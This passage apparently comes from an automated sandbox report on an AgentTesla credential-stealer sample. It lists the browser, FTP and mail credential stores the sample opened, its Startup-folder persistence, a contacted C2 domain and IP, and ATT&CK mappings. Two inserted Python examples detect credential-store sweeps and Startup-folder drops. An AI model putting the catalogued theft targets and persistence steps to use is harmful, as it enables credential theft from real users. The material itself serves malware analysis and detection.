                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.285607498.0000000000D75000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NKPhba0VZI.exe PID: 6112, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Drivers.exe PID: 6520, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NKPhba0VZI.exe PID: 6064, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Drivers.exe PID: 6980, type: MEMORY
                      Source: Yara match | File source: 5.2.NKPhba0VZI.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.Drivers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3ca23b8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3c05d70.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.4125d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3b9f940.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3ca23b8.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.41c23b8.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.41c23b8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.40bf940.4.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match | File source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NKPhba0VZI.exe PID: 6064, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Drivers.exe PID: 6980, type: MEMORY
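The file and registry accesses listed above are the classic AgentTesla credential-store sweep: one process reads the saved-login stores of several unrelated applications within seconds. The following Python is an added example for detecting that pattern from endpoint telemetry; it is not code from the report or from the sample. The store paths are exactly the ones the report records for NKPhba0VZI.exe. The event records, the Sysmon-style field names (ts, pid, image, target), the benign PIDs 4120 and 1300 and the OWNER_IMAGES allow-list are constructed for the example; PID 6064 is the sample's PID from the report. The heuristic goes slightly beyond the single case on the page in that it also suppresses a legitimate client reading its own store.

```python
"""Credential-store sweep detector.

Added example, not code from the report or from the AgentTesla sample:
groups file/registry access events by process and flags a process that
reads several distinct credential stores within a short window. The store
paths are the ones the report lists for NKPhba0VZI.exe; the event records
(Sysmon-style field names, timestamps, the benign PIDs) are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Credential stores the sample opened (from the report), keyed by a
# case-insensitive path fragment so user and profile names do not matter.
CREDENTIAL_STORES = {
    r"SOFTWARE\Martin Prikryl\WinSCP 2\Sessions": "WinSCP sessions",
    r"Mozilla\Firefox\profiles.ini": "Firefox profiles",
    r"Google\Chrome\User Data\Default\Login Data": "Chrome saved logins",
    r"SmartFTP\Client 2.0\Favorites\Quick Connect": "SmartFTP favorites",
    r"FileZilla\recentservers.xml": "FileZilla recent servers",
    r"Thunderbird\profiles.ini": "Thunderbird profiles",
    r"Windows Messaging Subsystem\Profiles\Outlook": "Outlook MAPI profile",
    r"Software\IncrediMail\Identities": "IncrediMail identities",
}

# Assumption: a browser or mail client reading its own store is normal and
# should not count towards a sweep.
OWNER_IMAGES = {
    "Firefox profiles": "firefox.exe",
    "Thunderbird profiles": "thunderbird.exe",
    "Chrome saved logins": "chrome.exe",
}


def classify(target):
    """Map a file or registry path to a credential-store label, or None."""
    t = target.lower()
    for fragment, label in CREDENTIAL_STORES.items():
        if fragment.lower() in t:
            return label
    return None


def detect_sweeps(events, min_stores=3, window=timedelta(seconds=60)):
    """Return [(pid, image, sorted store labels)] for every process that
    touched at least `min_stores` distinct stores inside `window`.
    Owner processes reading their own store are ignored."""
    touches = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        label = classify(ev["target"])
        if label is None:
            continue
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        if OWNER_IMAGES.get(label) == image_name:
            continue
        touches[ev["pid"]].append((datetime.fromisoformat(ev["ts"]), ev["image"], label))

    hits = []
    for pid, seq in touches.items():
        for i, (t0, image, _) in enumerate(seq):
            labels = {lbl for t, _img, lbl in seq[i:] if t - t0 <= window}
            if len(labels) >= min_stores:
                hits.append((pid, image, sorted(labels)))
                break
    return hits


SAMPLE_IMAGE = r"C:\Users\user\Desktop\NKPhba0VZI.exe"
# Constructed events: PID 6064 and the targets follow the report, the rest is noise.
SAMPLE_EVENTS = [
    {"ts": "2021-02-25T10:00:01", "pid": 6064, "image": SAMPLE_IMAGE,
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"ts": "2021-02-25T10:00:02", "pid": 6064, "image": SAMPLE_IMAGE,
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"ts": "2021-02-25T10:00:02", "pid": 6064, "image": SAMPLE_IMAGE,
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"ts": "2021-02-25T10:00:03", "pid": 6064, "image": SAMPLE_IMAGE,
     "target": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"ts": "2021-02-25T10:00:03", "pid": 6064, "image": SAMPLE_IMAGE,
     "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"ts": "2021-02-25T10:00:04", "pid": 6064, "image": SAMPLE_IMAGE,
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    # Benign noise: Firefox reading its own profile list, Explorer opening a document.
    {"ts": "2021-02-25T10:00:05", "pid": 4120, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"ts": "2021-02-25T10:00:06", "pid": 1300, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\Documents\notes.txt"},
]

if __name__ == "__main__":
    for pid, image, stores in detect_sweeps(SAMPLE_EVENTS):
        print(f"pid {pid} {image} swept {len(stores)} stores: {', '.join(stores)}")
```

Run against the constructed events, only PID 6064 is reported, with six distinct stores inside a four-second window; the Firefox read of its own profiles.ini and the Explorer file open produce nothing. The threshold of three stores is the trade-off knob: backup agents and some password managers legitimately read more than one store, so in production tune `min_stores` and `OWNER_IMAGES` against your own baseline rather than the values here.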

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 00000001.00000003.199780118.0000000001408000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.473641028.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.285607498.0000000000D75000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.474695925.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.463182723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.463217997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NKPhba0VZI.exe PID: 6112, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Drivers.exe PID: 6520, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NKPhba0VZI.exe PID: 6064, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Drivers.exe PID: 6980, type: MEMORY
                      Source: Yara match | File source: 5.2.NKPhba0VZI.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.Drivers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3ca23b8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3c05d70.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.4125d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3b9f940.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3ca23b8.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.41c23b8.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.41c23b8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.40bf940.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation211 | Startup Items1 | Startup Items1 | Disable or Modify Tools1 | OS Credential Dumping2 | File and Directory Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | PowerShell2 | Registry Run Keys / Startup Folder12 | Process Injection12 | Deobfuscate/Decode Files or Information1 | Input Capture1 | System Information Discovery114 | Remote Desktop Protocol | Data from Local System2 | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Registry Run Keys / Startup Folder12 | Obfuscated Files or Information2 | Credentials in Registry1 | Query Registry1 | SMB/Windows Admin Shares | Email Collection1 | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing3 | NTDS | Security Software Discovery211 | Distributed Component Object Model | Input Capture1 | Scheduled Transfer | Application Layer Protocol11 | SIM Card Swap | Carrier Billing Fraud |
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | Virtualization/Sandbox Evasion13 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion13 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection12 | DCSync | Application Window Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

                      Behavior Graph

                      Behavior Graph ID: 358333 | Sample: NKPhba0VZI.exe | Start date: 25/02/2021 | Architecture: WINDOWS | Score: 100

                      The graph's nodes and edges, rendered as a process tree with the files, hosts and signatures attached to each process:

                      Sample-level nodes:
                      • Contacted domain: nobettwo.xyz
                      • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      • Found malware configuration
                      • Multi AV Scanner detection for dropped file
                      • 8 other signatures

                      NKPhba0VZI.exe (started)
                        dropped: C:\Users\user\AppData\...\NKPhba0VZI.exe.log (ASCII)
                        signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                        NKPhba0VZI.exe (started)
                          network: nobettwo.xyz 198.54.126.101, 49737, 49738, 587, NAMECHEAP-NETUS, United States
                          signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
                        powershell.exe (started)
                          dropped: C:\Users\user\AppData\Roaming\...\Drivers.exe (PE32); C:\Users\user\...\Drivers.exe:Zone.Identifier (ASCII)
                          signatures: Drops PE files to the startup folder; Powershell drops PE file
                          conhost.exe (started)
                      Drivers.exe (started)
                        powershell.exe (started)
                          conhost.exe (started)
                        Drivers.exe (started)
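The behavior graph shows the persistence mechanism: powershell.exe writes Drivers.exe, a PE32 image, plus a Drivers.exe:Zone.Identifier stream into the per-user Startup folder, and the second tree rooted at Drivers.exe is that dropped copy running. The following Python is an added host-triage example and is not part of the Joe Sandbox report or the sample: it lists every file in a Startup folder that is a PE image by header rather than by extension, hashes it so the value can be compared with the report's hashes, and reads the Zone.Identifier stream when the filesystem exposes alternate data streams. STARTUP_FOLDER is the default per-user path (an assumption); the fixture directory and the header-only stub written by demo_fixture_dir() are constructed so the example runs anywhere.

```python
"""Startup-folder triage.

Added example, not part of the Joe Sandbox report: lists PE images placed
in a Startup folder (by header, not extension), hashes them and reads the
Zone.Identifier mark-of-the-web stream where the filesystem exposes it.
STARTUP_FOLDER is the default per-user path (assumption); the fixture
written by demo_fixture_dir() is constructed for the example.
"""
import hashlib
import os
import struct
import tempfile

STARTUP_FOLDER = os.path.expandvars(
    r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup")


def is_pe(data):
    """True if data starts with an MZ header whose e_lfanew points at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def zone_identifier(path):
    """Return the Zone.Identifier ADS text (ZoneId=3 marks an Internet download),
    or None when the stream is absent or the filesystem has no ADS support."""
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


def scan_startup_folder(folder=STARTUP_FOLDER):
    """Return one dict per PE file directly inside `folder` (empty if it does not exist)."""
    findings = []
    if not os.path.isdir(folder):
        return findings
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as f:
            data = f.read()
        if not is_pe(data):
            continue
        findings.append({
            "path": path,
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "zone_identifier": zone_identifier(path),
        })
    return findings


def minimal_pe_bytes():
    """Constructed 0x44-byte header-only stub that satisfies is_pe (not a runnable binary)."""
    hdr = bytearray(0x44)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr)


def demo_fixture_dir():
    """Create a throwaway folder mimicking the report's Startup drop:
    a PE named Drivers.exe next to a harmless non-PE file."""
    folder = tempfile.mkdtemp(prefix="startup_demo_")
    with open(os.path.join(folder, "Drivers.exe"), "wb") as f:
        f.write(minimal_pe_bytes())
    with open(os.path.join(folder, "desktop.ini"), "wb") as f:
        f.write(b"[.ShellClassInfo]\r\n")
    return folder


if __name__ == "__main__":
    target = STARTUP_FOLDER if os.path.isdir(STARTUP_FOLDER) else demo_fixture_dir()
    for hit in scan_startup_folder(target):
        print(f"{hit['path']}  {hit['size']} bytes  sha256={hit['sha256']}")
        print("  Zone.Identifier:", (hit["zone_identifier"] or "<none>").strip())
```

On a real host, run it under the user whose Startup folder is in question (the path is per-user) and compare each SHA-256 with the hashes in the report's dropped-files section. A missing Zone.Identifier stream on a PE that the graph says was written by PowerShell is itself a useful fact: a file the user downloaded through a browser normally carries ZoneId=3, whereas a file written by a script usually does not.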


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      NKPhba0VZI.exe | 26% | ReversingLabs | ByteCode-MSIL.Packed.Generic
                      NKPhba0VZI.exe | 100% | Joe Sandbox ML |

                      Dropped Files

                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | 26% | ReversingLabs | ByteCode-MSIL.Packed.Generic

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      20.2.Drivers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                      5.2.NKPhba0VZI.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

